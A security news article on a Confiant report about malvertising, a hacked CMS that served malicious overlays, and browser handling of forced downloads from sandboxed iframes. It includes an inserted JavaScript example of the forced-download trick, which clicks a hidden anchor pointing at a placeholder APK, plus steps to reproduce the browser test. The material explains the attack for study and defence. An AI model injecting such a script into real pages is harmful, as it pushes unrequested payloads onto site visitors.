
The State of Malvertising and Drive-By Downloads

A new Confiant report explores “the details behind a recent spree of website hacks” as well as the malicious payloads delivered to victims. The report also includes details on drive-by downloads, their current state in major browsers, and how they will be addressed in the future.

There’s more to malvertising than meets the eye

The researchers also look into malvertising campaigns more broadly, aiming to provide “a much broader landscape beyond what merely happens in the ad slot“. In other words, there is more to malvertising than malicious ads: media buys may be the attacker's preferred entry point, but they are not the only one available.

What is the current state of malvertising and drive-by downloads?

In a typical malvertising chain there are multiple handoffs, much like a legitimate ad-tech-driven CPA (cost-per-action) campaign. With malware, the later stages of the handoff simply happen among sketchy middlemen that pull the victim to a malicious landing page, Confiant explains.

The researchers closely inspected a malicious incident that affected the Android app version of BoingBoing in January 2020, when malicious overlays were detected on the site. Initially believed to be a “bad ad” incident, the same attack was later detected on other websites as well:

Over the following weeks, we detected this attack on a multitude of sites. Usually this manifests through a CMS compromise that introduces this malicious payload.

In other words, the supposed malvertising campaign turned out not to be malvertising at all. BoingBoing’s CMS had been hacked, and a script injected into the pages displayed the malicious overlays to visitors.

After some further investigation, the researchers discovered that the drive-by downloads were being initiated by JavaScript embedded in the page. The script would create an anchor element pointing at the payload and click it programmatically, without any user interaction, thus initiating the download.

A question then appeared: even though the BoingBoing attack wasn’t malvertising, could a similar scenario happen via malvertising and sandboxed iframes?

Most ad slots embed the creative in a sandboxed cross-origin iframe. Since the ad content is controlled by a third party, the iframe’s sandbox attribute is used to restrict what that third-party content is allowed to do on the page.
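The two mechanisms described above, the injected forced-download script and the iframe sandbox that is supposed to contain it, as an added example. This is not code from the Confiant report or from the BoingBoing incident; the payload URL and file name are constructed placeholders, and the `downloadPermitted` check encodes the rule Chrome adopted in version 83, where a sandboxed frame can only start a download if its sandbox attribute carries the `allow-downloads` token. The `document` object is passed in as a parameter so the attack shape can be exercised offline against a small stub.

```javascript
// Added example, not from the article or the Confiant report.
// Constructed placeholder values, not real attacker infrastructure.
const PAYLOAD_URL = "https://example.invalid/update.apk";
const PAYLOAD_NAME = "update.apk";

// The forced-download pattern: build an anchor with a download attribute,
// attach it, click it programmatically, and remove it again. No user gesture
// is involved; whether the browser honours it is the browser's decision.
// `doc` is the DOM document (or a stub) so this can run in Node as well.
function forceDownload(doc, url, filename) {
  const a = doc.createElement("a");
  a.href = url;
  a.download = filename; // "save this" rather than "navigate here"
  a.style.display = "none";
  doc.body.appendChild(a);
  a.click();
  doc.body.removeChild(a);
  return a;
}

// Split an iframe sandbox attribute into its tokens. A null attribute means
// the frame is not sandboxed at all; an empty string means fully sandboxed.
function sandboxTokens(sandboxAttr) {
  if (sandboxAttr === null || sandboxAttr === undefined) return null;
  return new Set(sandboxAttr.trim().split(/\s+/).filter(Boolean));
}

// Chrome 83+ rule: a sandboxed frame may only initiate downloads when the
// sandbox attribute includes allow-downloads. An unsandboxed frame is not
// restricted by this rule.
function downloadPermitted(sandboxAttr) {
  const tokens = sandboxTokens(sandboxAttr);
  if (tokens === null) return true;
  return tokens.has("allow-downloads");
}

// Minimal stand-in for `document` that records which anchors were clicked,
// so the script's behaviour can be checked without a browser.
function makeStubDocument() {
  const clicks = [];
  const body = {
    children: [],
    appendChild(node) { this.children.push(node); },
    removeChild(node) { this.children = this.children.filter((c) => c !== node); },
  };
  return {
    body,
    clicks,
    createElement(tag) {
      return {
        tag,
        style: {},
        href: "",
        download: "",
        click() { clicks.push({ href: this.href, download: this.download }); },
      };
    },
  };
}

// Offline walkthrough: the injected script fires once, leaves no trace in the
// DOM, and a typical ad-slot sandbox without allow-downloads would not permit it.
const stub = makeStubDocument();
forceDownload(stub, PAYLOAD_URL, PAYLOAD_NAME);
const typicalAdSandbox = "allow-scripts allow-same-origin allow-popups";
const verdict = {
  clicks: stub.clicks.length,
  leftover: stub.body.children.length,
  permittedInAdSlot: downloadPermitted(typicalAdSandbox),
  permittedUnsandboxed: downloadPermitted(null),
};
```

To reproduce the report's cross-browser test, host a page whose iframe points at a cross-origin document that calls `forceDownload(document, PAYLOAD_URL, PAYLOAD_NAME)` on load, once with and once without `allow-downloads` in the sandbox attribute, and note which browsers prompt, save silently, or block.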

How are browsers doing?

To check whether such a script could trigger a drive-by download of an APK from a sandboxed cross-origin iframe, the researchers built a proof-of-concept page and tested it in several browsers.

The inspiration for the analysis was the shocking discovery that most browsers will honor forced downloads from cross-origin frames. “In fact, forced downloads like this are still often possible in sandboxed cross-origin iframes, having only been addressed in Chrome in the latest release, Chrome 83,” the report explained.

Mozilla Firefox does not prevent downloads from cross-origin iframes, so the user is prompted to download the file. The Brave browser behaved the same way. As for Safari, for some reason the browser “wants to honor the download, but seems to just get stuck” and never finishes it.

Mobile browsers displayed inconsistent behavior:

For example, Android browsers are quick to warn you when the download is a file with an APK extension, but anything else often doesn’t even get a prompt.

As the report points out, it is quite surprising that today we can still force downloads that the user never initiated, without any prompt, from cross-origin iframes in most major browsers. Why that is so remains an open question.

A few years ago, Confiant discovered a large malvertising campaign that had been taking over entire ad servers to insert malicious ads into their inventories. The malicious ads redirected unsuspecting users to malware-ridden sites, typically masquerading the payload as an Adobe Flash Player update. The campaign had been running for at least nine months.

Milena Dimitrova
